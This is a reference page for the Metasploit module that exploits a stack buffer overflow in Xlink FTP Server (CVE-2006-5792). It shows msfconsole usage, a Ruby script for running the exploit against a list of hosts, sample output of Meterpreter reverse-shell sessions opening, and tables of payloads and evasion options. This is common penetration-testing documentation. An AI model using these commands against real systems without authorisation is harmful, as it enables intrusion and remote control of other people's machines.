Xlink FTP Server Buffer Overflow - Metasploit


This page contains detailed information about how to use the exploit/windows/ftp/xlink_server metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Xlink FTP Server Buffer Overflow
Module: exploit/windows/ftp/xlink_server
Source code: modules/exploits/windows/ftp/xlink_server.rb
Disclosure date: 2009-10-03
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: ftp
Target network port(s): 21, 2121
List of CVEs: CVE-2006-5792

This module exploits a stack buffer overflow in Xlink FTP Server that comes bundled with Omni-NFS Enterprise 5.2. When a overly long FTP request is sent to the server, arbitrary code may be executed.

Module Ranking and Traits


Module Ranking:

  • good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.

Basic Usage


Using xlink_server against a single host

Normally, you can use exploit/windows/ftp/xlink_server this way:

msf > use exploit/windows/ftp/xlink_server
msf exploit(xlink_server) > show targets
    ... a list of targets ...
msf exploit(xlink_server) > set TARGET target-id
msf exploit(xlink_server) > show options
    ... show and set options ...
msf exploit(xlink_server) > exploit

Using xlink_server against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your xlink_server will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/windows/ftp/xlink_server")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the windows/ftp/xlink_server exploit module looks in the msfconsole:

msf6 > use exploit/windows/ftp/xlink_server

[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(windows/ftp/xlink_server) > show info

       Name: Xlink FTP Server Buffer Overflow
     Module: exploit/windows/ftp/xlink_server
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good
  Disclosed: 2009-10-03

Provided by:
  MC <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Omni-NFS Enterprise V5.2

Check supported:
  Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   21               yes       The target port (TCP)

Payload information:
  Space: 260
  Avoid: 14 characters

Description:
  This module exploits a stack buffer overflow in Xlink FTP Server 
  that comes bundled with Omni-NFS Enterprise 5.2. When a overly long 
  FTP request is sent to the server, arbitrary code may be executed.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2006-5792
  OSVDB (58646)
  http://www.xlink.com

Module Options


This is a complete list of options available in the windows/ftp/xlink_server exploit:

msf6 exploit(windows/ftp/xlink_server) > show options

Module options (exploit/windows/ftp/xlink_server):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Omni-NFS Enterprise V5.2

Advanced Options


Here is a complete list of advanced options supported by the windows/ftp/xlink_server exploit:

msf6 exploit(windows/ftp/xlink_server) > show advanced

Module advanced options (exploit/windows/ftp/xlink_server):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FTPDEBUG                false            no        Whether or not to print verbose debug statements
   FTPTimeout              16               yes       The number of seconds to wait for a reply from an FTP command
   PassiveMode             false            no        Set true for extended passive (EPSV) ftp mode.
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (generic/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   ARCH                                         no        The architecture that is being targeted
   PLATFORM                                     no        The platform that is being targeted
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the windows/ftp/xlink_server module can exploit:

msf6 exploit(windows/ftp/xlink_server) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Omni-NFS Enterprise V5.2

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the windows/ftp/xlink_server exploit:

msf6 exploit(windows/ftp/xlink_server) > show payloads

Compatible Payloads
===================

   #   Name                                                 Disclosure Date  Rank    Check  Description
   -   ----                                                 ---------------  ----    -----  -----------
   0   payload/generic/custom                                                normal  No     Custom Payload
   1   payload/generic/debug_trap                                            normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                        normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                     normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                            normal  No     Generic x86 Tight Loop
   5   payload/windows/dllinject/bind_nonx_tcp                               normal  No     Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   6   payload/windows/dllinject/reverse_nonx_tcp                            normal  No     Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   7   payload/windows/dllinject/reverse_ord_tcp                             normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   8   payload/windows/exec                                                  normal  No     Windows Execute Command
   9   payload/windows/loadlibrary                                           normal  No     Windows LoadLibrary Path
   10  payload/windows/meterpreter/bind_nonx_tcp                             normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   11  payload/windows/meterpreter/reverse_nonx_tcp                          normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   12  payload/windows/meterpreter/reverse_ord_tcp                           normal  No     Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   13  payload/windows/metsvc_bind_tcp                                       normal  No     Windows Meterpreter Service, Bind TCP
   14  payload/windows/metsvc_reverse_tcp                                    normal  No     Windows Meterpreter Service, Reverse TCP Inline
   15  payload/windows/patchupdllinject/bind_nonx_tcp                        normal  No     Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   16  payload/windows/patchupdllinject/reverse_nonx_tcp                     normal  No     Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   17  payload/windows/patchupdllinject/reverse_ord_tcp                      normal  No     Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   18  payload/windows/patchupmeterpreter/bind_nonx_tcp                      normal  No     Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   19  payload/windows/patchupmeterpreter/reverse_nonx_tcp                   normal  No     Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   20  payload/windows/patchupmeterpreter/reverse_ord_tcp                    normal  No     Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   21  payload/windows/peinject/bind_nonx_tcp                                normal  No     Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
   22  payload/windows/peinject/reverse_nonx_tcp                             normal  No     Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
   23  payload/windows/peinject/reverse_ord_tcp                              normal  No     Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
   24  payload/windows/powershell_bind_tcp                                   normal  No     Windows Interactive Powershell Session, Bind TCP
   25  payload/windows/powershell_reverse_tcp                                normal  No     Windows Interactive Powershell Session, Reverse TCP
   26  payload/windows/shell/bind_nonx_tcp                                   normal  No     Windows Command Shell, Bind TCP Stager (No NX or Win7)
   27  payload/windows/shell/reverse_nonx_tcp                                normal  No     Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   28  payload/windows/shell/reverse_ord_tcp                                 normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   29  payload/windows/speak_pwned                                           normal  No     Windows Speech API - Say "You Got Pwned!"
   30  payload/windows/upexec/bind_nonx_tcp                                  normal  No     Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   31  payload/windows/upexec/reverse_nonx_tcp                               normal  No     Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   32  payload/windows/upexec/reverse_ord_tcp                                normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   33  payload/windows/vncinject/bind_nonx_tcp                               normal  No     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   34  payload/windows/vncinject/reverse_nonx_tcp                            normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   35  payload/windows/vncinject/reverse_ord_tcp                             normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)

Evasion Options


Here is the full list of possible evasion options supported by the windows/ftp/xlink_server exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/ftp/xlink_server) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • MC

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.